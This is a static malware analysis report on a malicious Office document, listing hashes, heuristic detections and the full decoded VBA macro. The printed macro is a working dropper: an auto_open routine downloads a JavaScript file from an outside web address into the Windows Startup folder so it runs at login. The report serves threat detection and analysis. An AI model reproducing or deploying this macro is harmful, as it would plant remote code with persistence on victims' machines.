Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 252ff3f6a25577fd…

MALICIOUS

Office (OOXML)

8.1 KB First seen: 2021-04-01
MD5: adc68c8f5080a16f41574dcc401a01b8 SHA-1: 0bd81a38200ef197727a07f99fd1ee5b59184405 SHA-256: 252ff3f6a25577fd4ae77429f96c382064f4b5d37d8e671ee78a44a7d8552c15
130 Risk Score

Heuristics 5

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
        Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        startupfolder = "C:\Users\" + CreateObject("WScript.Network").UserName + "\AppData\Roaming\" + "Microsoft\Windows\Start Menu\Programs\Startup\p223.js"
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub auto_open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://www.diamantesviagens.com.br/PPO.js Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1673 bytes
SHA-256: f0fdc31d474a7f520aaeabe2480ad06624d81caec80c42bbc8d94446ea04eab4
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Módulo1"
Option Explicit

#If VBA7 And Win64 Then
    Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
      Alias "URLDownloadToFileA" ( _
        ByVal pCaller As LongPtr, _
        ByVal szURL As String, _
        ByVal szFileName As String, _
        ByVal dwReserved As LongPtr, _
        ByVal lpfnCB As LongPtr _
      ) As Long
    Private Declare PtrSafe Function DeleteUrlCacheEntry Lib "Wininet.dll" _
      Alias "DeleteUrlCacheEntryA" ( _
        ByVal lpszUrlName As String _
      ) As Long
#Else
    Private Declare Function URLDownloadToFile Lib "urlmon" _
      Alias "URLDownloadToFileA" ( _
        ByVal pCaller As Long, _
        ByVal szURL As String, _
        ByVal szFileName As String, _
        ByVal dwReserved As Long, _
        ByVal lpfnCB As Long _
      ) As Long
    Private Declare Function DeleteUrlCacheEntry Lib "Wininet.dll" _
      Alias "DeleteUrlCacheEntryA" ( _
        ByVal lpszUrlName As String _
      ) As Long
#End If
Public Sub Download()
    On Error GoTo Err
    Dim Auxiliar As Long
    Dim URL As String, CaminhoLocal As String, startupfolder As String
    URL = "https://www.diamantesviagens.com.br/PPO.js"
    CaminhoLocal = "C:\Users\Public\pandorinha.zip"
    startupfolder = "C:\Users\" + CreateObject("WScript.Network").UserName + "\AppData\Roaming\" + "Microsoft\Windows\Start Menu\Programs\Startup\p223.js"

    Auxiliar = URLDownloadToFile(0, URL, startupfolder, 0, 0)
    'MsgBox "Download efetuado com sucesso!"
    Exit Sub
Err:
    MsgBox "Erro no download do arquivo"
End Sub
Sub auto_open()

Download

End Sub
vbaProject_00.bin vba-project OOXML VBA project: ppt/vbaProject.bin 15872 bytes
SHA-256: de33adbee46e6061f947177ffb8f09bb8e552ce175a3dbadc7b211a554e3eccf

Open this report in the interactive analyzer, or submit your own file for analysis.